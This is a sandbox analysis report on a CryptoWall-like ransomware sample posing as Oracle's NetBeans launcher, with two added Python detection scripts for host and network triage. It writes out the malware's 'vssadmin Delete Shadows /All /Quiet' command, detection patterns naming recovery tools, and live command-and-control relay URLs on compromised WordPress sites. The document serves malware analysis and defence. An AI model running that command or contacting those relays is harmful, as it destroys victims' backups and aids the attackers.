Analysis Date: 2015-10-06 09:33:56
MD5: 89b12afcba6d3919fa2a7d53dedfa36b
SHA1: 2c84c32333e0122a10c9977851372c67721b5ea3

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 3c07a3b3156483890ff2f7dc896ac0fc  sha1: 712ddd0276ff6a4c2c6e67153bd5a822a0adaacc  size: 144896
Section .data  md5: cb9045bdca4920e7005d594ec200a23b  sha1: 94e288029a39d27343f29805f68e41bd6c8f1ec9  size: 15872
Section .rsrc  md5: 35c50c7d9225943264b8c86f8667ffe9  sha1: 64dc19860ca3315622e8d23db4bb6a27abaefbd9  size: 90624
Timestamp: 2015-05-27 11:30:37 (PE compile time)
Version info (the resource mimics Oracle's NetBeans Platform Launcher, nbexec.exe; the 2015 PE timestamp postdates the claimed 2013 build, and the AV verdicts below identify the file as ransomware, not a NetBeans binary):
  LegalCopyright: © 2007, 2013 Oracle and/or its affiliates. All rights reserved.
  InternalName: nbexec
  FileVersion: 7.3.0.0
  Full Version: 14012013
  CompanyName: Oracle Corporation
  ProductName: NetBeans Platform Launcher 7.3
  ProductVersion: 7.3.0.0
  FileDescription: NetBeans Platform Launcher
  OriginalFilename: nbexec.exe
Packer: Microsoft Visual C++ ?.? (compiler signature; version not determined)
PEhash: 2e21a79752860bbdabbde16de5e5e042d169a8d2
IMPhash: cb618f5578007453dd8d7a3c37116a72
AV verdicts (23 of 31 engines detect):
AV Rising: no_virus
AV McAfee: no_virus
AV Avira (antivir): TR/Dropper.A.39476
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Symmi.52242
AV Alwil (avast): Sharik-H [Trj]
AV Eset (nod32): Win32/Injector.CBUB
AV Grisoft (avg): Win32/Cryptor
AV Symantec: no_virus
AV Fortinet: W32/Kryptik.DTSF!tr
AV BitDefender: Gen:Variant.Symmi.52242
AV K7: Trojan ( 004c3b711 )
AV Microsoft Security Essentials: Ransom:Win32/Crowti.A
AV MicroWorld (escan): Gen:Variant.Symmi.52242
AV MalwareBytes: Trojan.CryptoWall
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: Trojan.Win32.Injector
AV Emsisoft: Gen:Variant.Symmi.52242
AV Zillya!: Trojan.Blocker.Win32.28902
AV Kaspersky: Trojan.Win32.Generic
AV Trend Micro: TROJ_CR.AB64B513
AV CAT (quickheal): DownloaderAPT.Drixed.013270
AV VirusBlokAda (vba32): Hoax.Blocker
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Symmi.52242
AV Arcabit (arcavir): Gen:Variant.Symmi.52242
AV ClamAV: no_virus
AV Dr. Web: Trojan.PWS.Panda.2401
AV F-Secure: Gen:Variant.Symmi.52242
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: -k netsvcs  (image path not recorded by the sandbox; the arguments are those of a svchost.exe service-group host)
Creates Process: vssadmin.exe Delete Shadows /All /Quiet  (deletes every Volume Shadow Copy, removing the victim's local rollback option)

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
(The Internet Settings reads and the index.dat writes are WinINet artefacts, consistent with the HTTP traffic below going through the IE networking stack; hence the IE6/XP User-Agent.)
Winsock DNS: alchemyofpresence.com
Winsock DNS: tarifair.fr
Winsock DNS: blationmedia.com
Winsock DNS: 3bsgroup.com
Winsock DNS: atlantacustomwork.com
Winsock DNS: beijerlandsekelnerrace.nl
Winsock DNS: braingame.biz
Winsock DNS: appthere.com
Winsock DNS: bezpiecznaswinka.pl
Winsock DNS: curlmyip.com
Winsock DNS: bebeamor.co.uk
Winsock DNS: buroroebers.nl
Winsock DNS: bamboo.spb.ru
Winsock DNS: autorijschoolconsistent.nl
Winsock DNS: 7d2.c27.myftpupload.com
Winsock DNS: myexternalip.com
Winsock DNS: traditionetgourmandises.fr
Winsock DNS: odfgroup.com
Winsock DNS: andreiprundeanu.eu
Winsock DNS: ip-addr.es
Winsock DNS: assurancejeuneconducteurpascher.fr
Winsock DNS: jandchousecleaning.com
Winsock DNS: convenzioni.ording.roma.it
Winsock DNS: asambleadedios.org
Winsock DNS: alpha.akesha.com
Winsock DNS: sweetthangzdesserts.com
Winsock DNS: asadiag.com
Winsock DNS: redstarfuochicinesi.it
Winsock DNS: uptowndancealbany.com
Winsock DNS: 4042shopping.com
Winsock DNS: gonavarro.com
Winsock DNS: buhtime.by
Winsock DNS: doggonesigns.com
Winsock DNS: brandgriffin.com
Winsock DNS: ancientvoyages.com
Winsock DNS: awynnejoinery.co.uk
Winsock DNS: hostyoursitehere.com
Winsock DNS: jeanrey.fr
Winsock DNS: ammorgan.net
Winsock DNS: americanfamilyenergy.com
Winsock DNS: bshop.com.au
Winsock DNS: alsblueshelpt.nl
Winsock DNS: 99mkb.com
Winsock DNS: alebehr.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc
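The process and file activity above reads as follows: the sample starts explorer.exe and the rest of the work is logged under explorer.exe rather than under malware.exe (consistent with code injection into the shell), a copy with an 8-hex-character name is dropped into three locations including the Startup folder, and Volume Shadow Copies are deleted so encrypted files cannot be rolled back. The detection pass below is an added example written for this page, not output of the sandbox or of any vendor tool. The event records are hand-built from the Runtime Details above (constructed, not a real Sysmon or EDR export); the rule names and thresholds are the editor's own; and the wmic shadowcopy form plus the bcdedit/wbadmin entries are included as well-known equivalents, not as anything this sample ran.

```python
"""Host-side triage of the behaviours recorded in the sandbox run above.

Constructed example: the event records are hand-built from the report's
Runtime Details, not a real Sysmon/EDR export. Rule names are the editor's.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    parent: str    # parent image path
    image: str     # child image path ("" where the sandbox lost it, as for "-k netsvcs")
    cmdline: str   # child command line


@dataclass
class FileEvent:
    process: str   # image path of the writing process
    path: str      # file created


Finding = Tuple[str, str]   # (rule name, evidence)

# Shadow-copy deletion. The vssadmin form is what the report shows; the wmic
# form is the well-known equivalent, added here as a generalisation.
SHADOW_DELETE_RE = re.compile(
    r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)\b",
    re.IGNORECASE)
# Startup folder; this substring is the same on XP-era and Vista+ profile layouts.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.exe$", re.IGNORECASE)
# Drive-root directory whose name equals the dropped executable's name, e.g. C:\6ff06165\6ff06165.exe
SELF_NAMED_DIR_RE = re.compile(r"^[a-z]:\\([0-9a-f]{8})\\\1\.exe$", re.IGNORECASE)
# Processes that legitimately start the desktop shell.
EXPECTED_EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe"}
# Backup/recovery tooling a payload running inside explorer.exe tends to launch (editor's list).
RECOVERY_TOOLS = {"vssadmin.exe", "wmic.exe", "bcdedit.exe", "wbadmin.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(procs: List[ProcessEvent], files: List[FileEvent]) -> List[Finding]:
    """Apply the rules to process and file events; return one finding per hit."""
    findings: List[Finding] = []
    for ev in procs:
        if SHADOW_DELETE_RE.search(ev.cmdline):
            findings.append(("shadow_copy_deletion", ev.cmdline))
        if basename(ev.image) == "explorer.exe" and basename(ev.parent) not in EXPECTED_EXPLORER_PARENTS:
            findings.append(("unexpected_explorer_parent", f"{ev.parent} -> {ev.image}"))
        if basename(ev.parent) == "explorer.exe" and basename(ev.image) in RECOVERY_TOOLS:
            findings.append(("recovery_tool_from_explorer", ev.cmdline))
    # Same executable name written to several locations by one process.
    drops: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for fe in files:
        if STARTUP_RE.search(fe.path):
            findings.append(("startup_folder_persistence", fe.path))
        if SELF_NAMED_DIR_RE.match(fe.path):
            findings.append(("self_named_directory_drop", fe.path))
        if fe.path.lower().endswith(".exe"):
            drops[(fe.process.lower(), basename(fe.path))].append(fe.path)
    for (proc, name), paths in drops.items():
        if len(paths) >= 2:
            findings.append(("multi_location_drop", f"{proc} wrote {name} to {len(paths)} locations"))
    return findings


# Constructed from the Runtime Details above.
SAMPLE_PROCS = [
    ProcessEvent(r"C:\malware.exe", r"C:\WINDOWS\explorer.exe", r"C:\WINDOWS\explorer.exe"),
    ProcessEvent(r"C:\WINDOWS\explorer.exe", "", "-k netsvcs"),   # image path lost in the sandbox log
    ProcessEvent(r"C:\WINDOWS\explorer.exe", "vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
]
SAMPLE_FILES = [
    FileEvent(r"C:\WINDOWS\explorer.exe", r"C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe"),
    FileEvent(r"C:\WINDOWS\explorer.exe", r"C:\6ff06165\6ff06165.exe"),
    FileEvent(r"C:\WINDOWS\explorer.exe", r"C:\Documents and Settings\Administrator\Application Data\6ff06165.exe"),
]

if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_PROCS, SAMPLE_FILES):
        print(f"{rule:30s} {evidence}")
```

Run against the sample events this yields six findings, one per rule. The two parent/child rules are deliberately separate: a non-shell parent launching explorer.exe and explorer.exe launching recovery tooling are each weak on their own and strong together, and keeping them apart lets a SIEM weight them independently.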

Network Details:

DNS A: ip-addr.es ➝ 188.165.164.184
DNS A: myexternalip.com ➝ 78.47.139.102
DNS A: curlmyip.com ➝ 184.106.112.172
DNS A: alebehr.com ➝ 81.88.48.113
DNS A: autorijschoolconsistent.nl ➝ 91.184.19.41
DNS A: gonavarro.com ➝ 23.229.152.35
DNS A: 4042shopping.com ➝ 184.168.221.33
DNS A: alchemyofpresence.com ➝ 184.168.47.225
DNS A: 99mkb.com ➝ 184.168.174.1
DNS A: braingame.biz ➝ 75.103.83.9
DNS A: hostyoursitehere.com ➝ 50.62.71.1
DNS A: sweetthangzdesserts.com ➝ 160.153.94.8
DNS A: asadiag.com ➝ 148.251.140.60
DNS A: bebeamor.co.uk ➝ 146.255.46.1
DNS A: beijerlandsekelnerrace.nl ➝ 46.235.40.4
DNS A: odfgroup.com ➝ 188.65.114.122
DNS A: blationmedia.com ➝ 184.168.47.225
DNS A: americanfamilyenergy.com ➝ 50.62.160.229
DNS A: atlantacustomwork.com ➝ 184.168.221.53
DNS A: ancientvoyages.com ➝ 23.229.143.195
DNS A: bshop.com.au ➝ 202.124.241.203
DNS A: brandgriffin.com ➝ 205.144.171.13
DNS A: awynnejoinery.co.uk ➝ 104.18.58.244, 104.18.59.244
DNS A: bamboo.spb.ru ➝ 80.93.62.84
DNS A: tarifair.fr ➝ 185.26.125.15
DNS A: andreiprundeanu.eu ➝ 82.77.75.173
DNS A: 3bsgroup.com ➝ 50.62.123.1
DNS A: ording.ferreroassociati.com ➝ 137.117.179.186
DNS A: alsblueshelpt.nl ➝ 62.221.204.114
DNS A: 7d2.c27.myftpupload.com ➝ 184.168.47.225
DNS A: buroroebers.nl ➝ 37.128.147.22
DNS A: jandchousecleaning.com ➝ 184.168.47.225
DNS A: buhtime.by ➝ 93.125.99.58
DNS A: jeanrey.fr ➝ 213.186.33.50
DNS A: uptowndancealbany.com ➝ 107.180.1.214
DNS A: appthere.com ➝ 141.8.225.244
DNS A: assurancejeuneconducteurpascher.fr ➝ 213.186.33.3
DNS A: doggonesigns.com ➝ 127.0.0.1
DNS A: ammorgan.net ➝ 184.168.47.225
DNS A: bezpiecznaswinka.pl ➝ (no address returned)
DNS A: asambleadedios.org ➝ (no address returned)
DNS A: traditionetgourmandises.fr ➝ (no address returned)
DNS A: convenzioni.ording.roma.it ➝ (no address returned)
DNS A: alpha.akesha.com ➝ (no address returned)
DNS A: redstarfuochicinesi.it ➝ (no address returned)
HTTP (every request below carries User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727))
HTTP GET: http://ip-addr.es/
HTTP GET: http://myexternalip.com/raw
HTTP GET: http://curlmyip.com/
HTTP POST: http://alebehr.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?k=govvrox2s6r
HTTP POST: http://autorijschoolconsistent.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?j=govvrox2s6r
HTTP POST: http://gonavarro.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?q=govvrox2s6r
HTTP POST: http://4042shopping.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?i=govvrox2s6r
HTTP POST: http://alchemyofpresence.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=govvrox2s6r
HTTP POST: http://99mkb.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?p=govvrox2s6r
HTTP POST: http://braingame.biz/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=govvrox2s6r
HTTP POST: http://hostyoursitehere.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?t=govvrox2s6r
HTTP POST: http://sweetthangzdesserts.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?p=govvrox2s6r
HTTP POST: http://asadiag.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?l=govvrox2s6r
HTTP POST: http://bebeamor.co.uk/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?h=govvrox2s6r
HTTP POST: http://beijerlandsekelnerrace.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?f=govvrox2s6r
HTTP POST: http://odfgroup.com/wp-content/uploads/wpallimport/uploads/eaff1c028b48519b140086082d15f7a3/img4.php?w=govvrox2s6r
HTTP POST: http://blationmedia.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?o=govvrox2s6r
HTTP POST: http://americanfamilyenergy.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?n=govvrox2s6r
HTTP POST: http://atlantacustomwork.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?a=govvrox2s6r
HTTP POST: http://ancientvoyages.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?a=govvrox2s6r
HTTP POST: http://bshop.com.au/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?t=govvrox2s6r
HTTP POST: http://brandgriffin.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=govvrox2s6r
HTTP POST: http://awynnejoinery.co.uk/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?a=govvrox2s6r
HTTP POST: http://bamboo.spb.ru/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?o=govvrox2s6r
HTTP POST: http://tarifair.fr/wp-content/uploads/wpallimport/uploads/c93320dc393203a3bdc1a987a3bd1ea7/img4.php?r=govvrox2s6r
HTTP POST: http://andreiprundeanu.eu/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?n=govvrox2s6r
HTTP POST: http://3bsgroup.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?g=govvrox2s6r
HTTP POST: http://convenzioni.ording.roma.it/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?l=govvrox2s6r
HTTP POST: http://alsblueshelpt.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?e=govvrox2s6r
HTTP POST: http://7d2.c27.myftpupload.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?x=govvrox2s6r
HTTP POST: http://buroroebers.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?a=govvrox2s6r
HTTP POST: http://jandchousecleaning.com/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?r=govvrox2s6r
HTTP POST: http://buhtime.by/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=govvrox2s6r
HTTP POST: http://jeanrey.fr/wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?i=govvrox2s6r
HTTP POST: http://uptowndancealbany.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?u=govvrox2s6r
HTTP POST: http://appthere.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?i=govvrox2s6r
HTTP POST: http://assurancejeuneconducteurpascher.fr/wp-content/uploads/wpallimport/uploads/6826fa428ee44eea2896299a9cdd1391/img1.php?x=govvrox2s6r
HTTP POST: http://ammorgan.net/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?m=govvrox2s6r
Flows TCP: 192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1034 ➝ 81.88.48.113:80
Flows TCP: 192.168.1.1:1035 ➝ 91.184.19.41:80
Flows TCP: 192.168.1.1:1036 ➝ 23.229.152.35:80
Flows TCP: 192.168.1.1:1037 ➝ 184.168.221.33:80
Flows TCP: 192.168.1.1:1038 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1039 ➝ 184.168.174.1:80
Flows TCP: 192.168.1.1:1040 ➝ 75.103.83.9:80
Flows TCP: 192.168.1.1:1041 ➝ 50.62.71.1:80
Flows TCP: 192.168.1.1:1042 ➝ 160.153.94.8:80
Flows TCP: 192.168.1.1:1043 ➝ 148.251.140.60:80
Flows TCP: 192.168.1.1:1044 ➝ 146.255.46.1:80
Flows TCP: 192.168.1.1:1045 ➝ 46.235.40.4:80
Flows TCP: 192.168.1.1:1046 ➝ 188.65.114.122:80
Flows TCP: 192.168.1.1:1047 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1048 ➝ 50.62.160.229:80
Flows TCP: 192.168.1.1:1049 ➝ 184.168.221.53:80
Flows TCP: 192.168.1.1:1050 ➝ 23.229.143.195:80
Flows TCP: 192.168.1.1:1051 ➝ 202.124.241.203:80
Flows TCP: 192.168.1.1:1052 ➝ 205.144.171.13:80
Flows TCP: 192.168.1.1:1053 ➝ 104.18.58.244:80
Flows TCP: 192.168.1.1:1054 ➝ 80.93.62.84:80
Flows TCP: 192.168.1.1:1055 ➝ 185.26.125.15:80
Flows TCP: 192.168.1.1:1056 ➝ 82.77.75.173:80
Flows TCP: 192.168.1.1:1057 ➝ 50.62.123.1:80
Flows TCP: 192.168.1.1:1058 ➝ 137.117.179.186:80
Flows TCP: 192.168.1.1:1059 ➝ 62.221.204.114:80
Flows TCP: 192.168.1.1:1060 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1061 ➝ 37.128.147.22:80
Flows TCP: 192.168.1.1:1062 ➝ 184.168.47.225:80
Flows TCP: 192.168.1.1:1063 ➝ 93.125.99.58:80
Flows TCP: 192.168.1.1:1064 ➝ 213.186.33.50:80
Flows TCP: 192.168.1.1:1065 ➝ 107.180.1.214:80
Flows TCP: 192.168.1.1:1066 ➝ 141.8.225.244:80
Flows TCP: 192.168.1.1:1067 ➝ 213.186.33.3:80
Flows TCP: 192.168.1.1:1069 ➝ 184.168.47.225:80
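The network sequence above is the beacon: three "what is my IP" lookups, then one POST to each of 35 unrelated domains, always to a script named img1.php through img5.php under one of two WordPress paths, always with the same 11-character token in a single-letter query parameter. Many unrelated sites sharing a script under Slider Revolution's update_extract directory or a WP All Import upload directory is consistent with compromised WordPress installs serving as first-tier relays; the hostname is noise, the path shape and the token are the constants worth matching. The script below is an added example, not part of the report or of any vendor's tooling: it classifies a constructed request list (a subset copied from the HTTP section above, plus one benign request) and correlates the IP checks with the fan-out POSTs. The names classify(), analyse() and the min_hosts threshold are choices made here.

```python
"""Network-side triage of the beacon pattern recorded above.

Constructed example: the request list is a hand-copied subset of the report's
HTTP section plus one unrelated request; it is not a real proxy export, and the
function names and threshold are the editor's own.
"""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Optional, Set, Tuple
from urllib.parse import parse_qsl, urlsplit


class Request(NamedTuple):
    method: str
    url: str


# "What is my IP" services contacted before the POSTs (the three seen in the
# report). Low signal alone, high signal when followed by multi-host beaconing.
IP_CHECK_HOSTS = {"ip-addr.es", "myexternalip.com", "curlmyip.com"}

# Relay path shapes from the report: imgN.php under Slider Revolution's
# update_extract directory or under a WP All Import upload directory whose
# name is 32 hex characters. The host is deliberately not matched.
RELAY_PATH_RE = re.compile(
    r"^/wp-content/(?:plugins/revslider/temp/update_extract/revslider"
    r"|uploads/wpallimport/uploads/[0-9a-f]{32})/img[1-5]\.php$"
)
# Opaque alphanumeric token carried in the single query parameter.
TOKEN_RE = re.compile(r"[a-z0-9]{8,16}")


def classify(req: Request) -> Tuple[str, str, Optional[str]]:
    """Return (kind, host, token); kind is external_ip_check, c2_relay_post or other."""
    parts = urlsplit(req.url)
    host = (parts.hostname or "").lower()
    if req.method == "GET" and host in IP_CHECK_HOSTS:
        return ("external_ip_check", host, None)
    if req.method == "POST" and RELAY_PATH_RE.match(parts.path):
        params = parse_qsl(parts.query, keep_blank_values=True)
        if len(params) == 1:
            key, value = params[0]
            if len(key) == 1 and key.isalpha() and TOKEN_RE.fullmatch(value):
                return ("c2_relay_post", host, value)
    return ("other", host, None)


def analyse(requests: List[Request], min_hosts: int = 3) -> Dict[str, object]:
    """Correlate IP checks with same-token POSTs fanned out across unrelated hosts."""
    ip_checks: List[str] = []
    hosts_by_token: Dict[str, Set[str]] = defaultdict(set)
    for req in requests:
        kind, host, token = classify(req)
        if kind == "external_ip_check":
            ip_checks.append(host)
        elif kind == "c2_relay_post" and token is not None:
            hosts_by_token[token].add(host)
    beacon_tokens = [t for t, hs in hosts_by_token.items() if len(hs) >= min_hosts]
    if beacon_tokens and ip_checks:
        verdict = "cryptowall_like_beacon"   # IP discovery, then fan-out POSTs with one token
    elif beacon_tokens:
        verdict = "relay_fanout"
    else:
        verdict = "no_alert"
    return {
        "verdict": verdict,
        "ip_check_hosts": ip_checks,
        "beacon_tokens": sorted(beacon_tokens),
        "relay_hosts": sorted({h for hs in hosts_by_token.values() for h in hs}),
    }


# Constructed from the HTTP section above (subset) plus one benign request.
REVSLIDER = "/wp-content/plugins/revslider/temp/update_extract/revslider/"
SAMPLE_REQUESTS = [
    Request("GET", "http://ip-addr.es/"),
    Request("GET", "http://myexternalip.com/raw"),
    Request("GET", "http://curlmyip.com/"),
    Request("POST", "http://alebehr.com" + REVSLIDER + "img5.php?k=govvrox2s6r"),
    Request("POST", "http://autorijschoolconsistent.nl" + REVSLIDER + "img2.php?j=govvrox2s6r"),
    Request("POST", "http://gonavarro.com" + REVSLIDER + "img5.php?q=govvrox2s6r"),
    Request("POST", "http://odfgroup.com/wp-content/uploads/wpallimport/uploads/eaff1c028b48519b140086082d15f7a3/img4.php?w=govvrox2s6r"),
    Request("POST", "http://tarifair.fr/wp-content/uploads/wpallimport/uploads/c93320dc393203a3bdc1a987a3bd1ea7/img4.php?r=govvrox2s6r"),
    Request("GET", "http://www.example.com/index.html"),   # constructed benign request
]

if __name__ == "__main__":
    for k, v in analyse(SAMPLE_REQUESTS).items():
        print(f"{k}: {v}")
```

The relay hosts the run produces double as a block list, but the durable indicator is RELAY_PATH_RE plus the one-parameter token shape: the operators rotate compromised sites far faster than they change the dropped script's location, so a proxy rule on the path (any host) outlives a domain list.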
